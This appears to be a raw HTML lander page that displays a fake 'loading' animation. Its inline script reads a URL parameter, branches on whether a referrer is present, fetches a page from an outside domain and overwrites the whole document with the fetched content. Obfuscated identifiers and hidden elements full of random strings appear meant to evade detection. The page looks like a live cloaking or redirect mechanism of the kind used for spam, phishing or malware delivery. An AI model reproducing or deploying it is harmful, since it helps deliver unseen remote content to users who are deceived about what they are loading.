<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Og8Hw7Y6k {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Og8Hw7Y6k .c4ua5oc2 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Og8Hw7Y6k .content {
            line-height: 50px;
            text-align: center
        }

        .Og8Hw7Y6k .img {
            width: 100%
        }

        .Og8Hw7Y6k .rhO1q9cb {
            text-align: center
        }

        .Og8Hw7Y6k .rhO1q9cb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Og8Hw7Y6k .rhO1q9cb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Og8Hw7Y6k .rhO1q9cb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Og8Hw7Y6k .rhO1q9cb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Og8Hw7Y6k .rhO1q9cb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Og8Hw7Y6k .rhO1q9cb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Og8Hw7Y6k .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xV7opEzdoWlC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xW9pq = xV7opEzdoWlC('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xW9pq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xW9pq +".html?a=share";
		}
		
        j3M9aBw=url+"#"+new Date().getTime();
        j3M9aBw && function() {
            $.get(j3M9aBw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>OaEzdBdBNaTIGN1M</div>
<h1 style='display:none' >P6hd6nsKyO6eEDpOhYBUJVMeXQcXExTI7dzEAMrCWHk</h1>
<span style='display:none'>jDDI2syHMAHkbc4GYKjEyIQZf024ypbYSUPKFyYyHM5keQoMo0qLOg2jZ6kbEYbbLjvOuSfeZa</span>
<li style='display:none' >uiq7ZXpq5ahGWuC6xsrQW9SLQEHuP2Ha1p0Ef5zzRrYtx94w0r82UlJtvKBxWcMVrju5zjbtrnSkzhJyLy</li>
<h1 style='display:none' >P6hd6nsKyO6eEDpOhYBUJVMeXQcXExTI7dzEAMrCWHk</h1><div class="Og8Hw7Y6k">
    <div class="c4ua5oc2">
        <div class="rhO1q9cb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ICsbcXJS5lw4KS1LUgy3QuFn</span>
<a  href='#' style='display:none'>iGuQYDachp4J3Zy9kAOHh8eBApDZzDgPhgLPtHqVbtvRRq8xGhAXMFK2sYFZzd6oxRKs51A23gParo0YQzjzGK2A</a>
<img  src='' style='display:none'></body>
</html>